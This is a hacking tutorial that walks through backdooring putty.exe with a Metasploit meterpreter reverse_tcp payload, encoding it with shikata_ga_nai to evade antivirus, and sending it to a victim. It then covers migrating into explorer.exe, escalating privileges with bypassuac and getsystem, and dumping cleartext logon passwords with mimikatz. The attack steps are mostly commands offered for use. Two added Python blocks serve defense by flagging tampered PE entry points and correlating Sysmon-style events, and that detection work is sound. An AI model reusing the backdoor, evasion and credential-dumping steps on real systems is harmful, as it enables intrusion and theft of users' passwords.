First of all we will create a payload (which we will later send to the victim for execution), but do you think somebody is going to click on a simple file which does nothing even on being executed and still not get suspicious? The answer is simple: NO.
So here we will bind the file with a legitimate executable, which in turn reduces the suspicion factor drastically. In this tutorial I'm using a very simple program (putty.exe) which just pops up "You just got Pwned!" (I know this clearly tips off the victim, but this is just for the sake of the tutorial; you can use any .exe of your choice).
The troubles don't end here: any AV (anti-virus) is going to catch a plain msf payload. This is where crypting comes into play. In this tutorial I am using the x86/shikata_ga_nai encoder, which although ranked as "excellent" in msfencode does not make the file FUD (Fully UnDetectable), but it does reduce the chances of getting caught depending on the AV deployed on the victim machine. There are methods of making files FUD, but they would deviate us from our current aim.

So let’s get started.
Stuff you'll need
  • Kali Linux / Backtrack
  • Windows machine(target)
  • A little bit of linux and msf knowledge (although i have tried to explain every single thing)
  • Mimikatz
$- cd ./Desktop
$- unzip -d /root/Desktop/mimikatz

Here first we change our directory to the desktop, then extract mimikatz (the tool to dump Windows passwords in clear text) into a directory on the desktop.

Next we make a folder called "hax", copy "putty.exe" from the desktop to the newly created directory, recheck using the "ls" command and then change directory to "hax".
Then we fire the next command:

$- cp putty.exe /usr/share/metasploit-framework/data/templates/

This is because we are using “putty.exe” as a template in the next command, so it needs to be in place.

$- msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=4443 R | msfencode -t exe -x putty.exe -k -o bdoor_putty.exe -e x86/shikata_ga_nai -c 3

Where "LHOST" is the IP address and "LPORT" is the port (I'm using 4443; you can use any) of the attacking machine.
Here we are creating a backdoor. "R" asks for raw output, which allows us to 'pipe' the code into the encoder (the | is the 'pipe'). Then we use "-t" to specify the type of output (exe in this case), "-x" to name the template (putty.exe in this case), the "-k" switch to retain the original functionality of the program into which the backdoor is inserted, "-o" to specify the output name, "-e" to specify the encoder to be used and finally "-c" to specify the number of encoding passes.
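From the defender's side, the "-k" template trick above is what a file-inspection heuristic looks for: keeping the original program working while adding a payload generally means appending new code to the PE and pointing AddressOfEntryPoint at it. The following is an added example, not code from this post or from Metasploit. It parses the PE section table without third-party modules and reports where the entry point lands; the two PE images are constructed header-only test data (no code, not runnable as programs), and the check is a heuristic that also fires on packed binaries, so a hit is a reason to look closer rather than proof of tampering.

```python
"""Heuristic check for where a PE's entry point lands (defender-side, added example)."""
import struct

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000


def parse_sections(data):
    """Return (entry_rva, sections) from a PE file image held in memory."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                       # 20-byte COFF file header
    num_sections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20                           # optional header; entry point RVA sits at +16
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    sections = []
    for i in range(num_sections):
        off = opt + opt_size + 40 * i         # section table entries are 40 bytes each
        name, vsize, vaddr = struct.unpack_from("<8sII", data, off)
        chars = struct.unpack_from("<I", data, off + 36)[0]
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "vaddr": vaddr, "vsize": vsize, "characteristics": chars})
    return entry_rva, sections


def assess(data):
    """List heuristic findings about the entry point's section; empty means nothing odd."""
    entry_rva, sections = parse_sections(data)
    holder = None
    for idx, s in enumerate(sections):
        if s["vaddr"] <= entry_rva < s["vaddr"] + s["vsize"]:
            holder = (idx, s)
    if holder is None:
        return ["entry point lies outside every section"]
    idx, s = holder
    flags = s["characteristics"]
    findings = []
    if len(sections) > 1 and idx == len(sections) - 1:
        findings.append(f"entry point is in the last section ({s['name']!r})")
    if not flags & IMAGE_SCN_MEM_EXECUTE:
        findings.append(f"entry section {s['name']!r} is not marked executable")
    if flags & IMAGE_SCN_MEM_WRITE and flags & IMAGE_SCN_MEM_EXECUTE:
        findings.append(f"entry section {s['name']!r} is both writable and executable")
    return findings


def build_pe(sections, entry_rva):
    """Construct a minimal PE32 header (test data only) from (name, vaddr, vsize, flags) tuples."""
    opt_size = 224                            # size of a PE32 optional header
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", 0x40)   # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)     # PE32 magic
    struct.pack_into("<I", opt, 16, entry_rva)
    table = b"".join(
        struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"),
                    vsize, vaddr, vsize, 0, 0, 0, 0, 0, flags)
        for name, vaddr, vsize, flags in sections)
    return dos + b"PE\0\0" + coff + bytes(opt) + table


# Constructed samples: a normal layout, and one whose entry point was moved into an
# appended writable+executable section, the shape a bound payload tends to leave.
CODE = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ
DATA = IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
CLEAN_PE = build_pe([(".text", 0x1000, 0x2000, CODE), (".data", 0x3000, 0x1000, DATA)], 0x1200)
SUSPECT_PE = build_pe([(".text", 0x1000, 0x2000, CODE), (".data", 0x3000, 0x1000, DATA),
                       (".bdoor", 0x4000, 0x1000, CODE | IMAGE_SCN_MEM_WRITE)], 0x4010)

if __name__ == "__main__":
    for label, img in (("clean", CLEAN_PE), ("suspect", SUSPECT_PE)):
        print(label, assess(img) or "no findings")
```

On a real file, read it with `open(path, "rb").read()` and pass the bytes to `assess`; pair the result with a hash comparison against the publisher's release, since an executable that matches the vendor's hash needs no heuristic at all.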

If we hadn’t copied “putty.exe” to /usr/share/metasploit-framework/data/templates/ then we would have encountered an error similar to the one given below:

[-] x86/shikata_ga_nai failed: No such file or directory - /usr/share/metasploit-framework/data/templates/putty.exe
[-] No encoders succeeded.

Then we make it executable using the chmod command.
$- chmod +x bdoor_putty.exe

Now we need to send the backdoored "putty.exe" to the victim and wait for him to execute it.
Meanwhile let us prepare to receive the shell.
$- msfconsole
$- use exploit/multi/handler
$- set payload windows/meterpreter/reverse_tcp
$- set LHOST
$- set LPORT 4443

Then we use
$- show options
to make sure our settings are fine.

Next we use
$- exploit

And upon execution of our backdoored “putty.exe” putty opens up just fine on the victim’s side.

But on our side the scene has changed a bit.

As you can see, we got a meterpreter session on the target machine(finally!).
But now a process "bdoor_putty.exe" has been started on the victim's PC, which means we will lose our session as soon as the victim closes our backdoored program. Therefore we will migrate to a more stable process (explorer.exe in this case).

$- run migrate -n explorer.exe

Then let us create a folder called "mimi" where we will upload all the contents of mimikatz/Win32 (the target machine is 32-bit). The upload needs "-r" because we are sending a whole directory.
$- mkdir c:\\mimi
$- upload -r /root/Desktop/mimikatz/Win32 c:\\mimi

Now lets fire up mimikatz.

$- execute -f c:\\mimi\\mimikatz.exe -H -i

Here the "-H" switch was used to create the process hidden from view and "-i" was used to interact with the process after it is created.

Then we type the following command in mimikatz
$- privilege::debug

Although the tool's output is in French, we can see that it does not have "all privileges", which means we need to get system (system, not administrator) level privileges.
So now, to attain system level privileges, we use post/windows/escalate/bypassuac:
$- run post/windows/escalate/bypassuac
Then, as we can see, it created another meterpreter session with elevated privileges. So now we switch to the newly created session and run "getsystem".

$- background
$- sessions -i 2
$- getsystem
Now we go into the same directory where we had uploaded mimikatz and run the executable.
$- cd c:\\mimi
$- execute -f cmd.exe -H -i
$- mimikatz.exe
And then type the following command to check that we now have the proper privileges.
$- privilege::debug

So now we see that everything is “OK”.
Now, to get the password of the logged-in user, we use the following command.
$- sekurlsa::logonPasswords

There are chances that a very big list might pop up, but you can easily distinguish the information of interest.
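Each step in the chain just described leaves host telemetry that a defender can correlate: the dropped executable calling back to the handler, the migration into explorer.exe (meterpreter's migrate creates a remote thread in the target), and a process spawned from the injected host reading lsass.exe memory (which is what sekurlsa::logonPasswords does). The following is an added example, not part of the original post. The events are constructed to resemble Sysmon event IDs 1 (ProcessCreate), 3 (NetworkConnect), 8 (CreateRemoteThread) and 10 (ProcessAccess), but the dict keys are simplified names rather than Sysmon's exact field names, and the allowlist of legitimate lsass readers is a placeholder.

```python
"""Correlate constructed Sysmon-style events into the callback -> inject -> lsass-read chain."""
import ntpath

PROCESS_VM_READ = 0x0010            # access right required to read another process's memory
LSASS = "lsass.exe"
# Hypothetical allowlist of images that may legitimately open lsass (an EDR sensor, say).
LSASS_READERS_ALLOWED = {r"c:\windows\system32\svchost.exe"}

SAMPLE_EVENTS = [  # constructed, not captured from a real host
    {"id": 1, "image": r"C:\Users\bob\Downloads\bdoor_putty.exe", "pid": 3120, "parent_pid": 2200},
    {"id": 3, "image": r"C:\Users\bob\Downloads\bdoor_putty.exe", "pid": 3120,
     "dst_ip": "203.0.113.10", "dst_port": 4443},
    {"id": 8, "source_image": r"C:\Users\bob\Downloads\bdoor_putty.exe", "source_pid": 3120,
     "target_image": r"C:\Windows\explorer.exe", "target_pid": 1640},
    {"id": 1, "image": r"C:\mimi\mimikatz.exe", "pid": 4480, "parent_pid": 1640},
    {"id": 10, "source_image": r"C:\mimi\mimikatz.exe", "source_pid": 4480,
     "target_image": r"C:\Windows\System32\lsass.exe", "granted_access": 0x1010},
    # benign noise: a browser on 443, and a service opening lsass with a query-only mask
    {"id": 3, "image": r"C:\Program Files\Mozilla Firefox\firefox.exe", "pid": 2200,
     "dst_ip": "198.51.100.5", "dst_port": 443},
    {"id": 10, "source_image": r"C:\Windows\System32\svchost.exe", "source_pid": 900,
     "target_image": r"C:\Windows\System32\lsass.exe", "granted_access": 0x1000},
]


def is_user_writable(image):
    """True when the executable lives where an unprivileged user can drop files."""
    low = image.lower()
    return low.startswith("c:\\users\\") or "\\temp\\" in low or "\\appdata\\" in low


def detect(events):
    """Stage-level alerts, one per matching event."""
    alerts = []
    for e in events:
        if e["id"] == 3 and is_user_writable(e["image"]):
            alerts.append({"rule": "outbound_from_user_path", "pid": e["pid"],
                           "dst": f'{e["dst_ip"]}:{e["dst_port"]}'})
        elif e["id"] == 8 and is_user_writable(e["source_image"]):
            alerts.append({"rule": "remote_thread_injection", "pid": e["source_pid"],
                           "target_pid": e["target_pid"],
                           "target": ntpath.basename(e["target_image"]).lower()})
        elif (e["id"] == 10 and ntpath.basename(e["target_image"]).lower() == LSASS
              and e["granted_access"] & PROCESS_VM_READ
              and e["source_image"].lower() not in LSASS_READERS_ALLOWED):
            alerts.append({"rule": "lsass_memory_read", "pid": e["source_pid"],
                           "granted_access": hex(e["granted_access"])})
    return alerts


def find_chains(events, alerts):
    """Link stages by process id: callback pid -> injection -> lsass reader spawned by the host."""
    parents = {e["pid"]: e["parent_pid"] for e in events if e["id"] == 1}
    callbacks = {a["pid"] for a in alerts if a["rule"] == "outbound_from_user_path"}
    readers = {a["pid"] for a in alerts if a["rule"] == "lsass_memory_read"}
    chains = []
    for inj in (a for a in alerts if a["rule"] == "remote_thread_injection"):
        stages = ["remote_thread_injection"]
        if inj["pid"] in callbacks:
            stages.insert(0, "outbound_from_user_path")
        host = inj["target_pid"]
        # the reader is either the injected host itself or a child it spawned
        reader = next((r for r in readers if r == host or parents.get(r) == host), None)
        if reader is not None:
            stages.append("lsass_memory_read")
        if len(stages) > 1:
            chains.append({"origin_pid": inj["pid"], "host_pid": host,
                           "reader_pid": reader, "stages": stages})
    return chains


if __name__ == "__main__":
    found = detect(SAMPLE_EVENTS)
    for c in find_chains(SAMPLE_EVENTS, found):
        print("chain:", " -> ".join(c["stages"]), c)
```

The lsass rule on its own is noisy (backup agents and security products open lsass too), which is why the allowlist exists; the confidence comes from the chain, a user-path executable that both called out and injected into a long-lived process whose child then read lsass.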
With this I end this tutorial, I hope it proved helpful for you. Please use the comment section wisely.
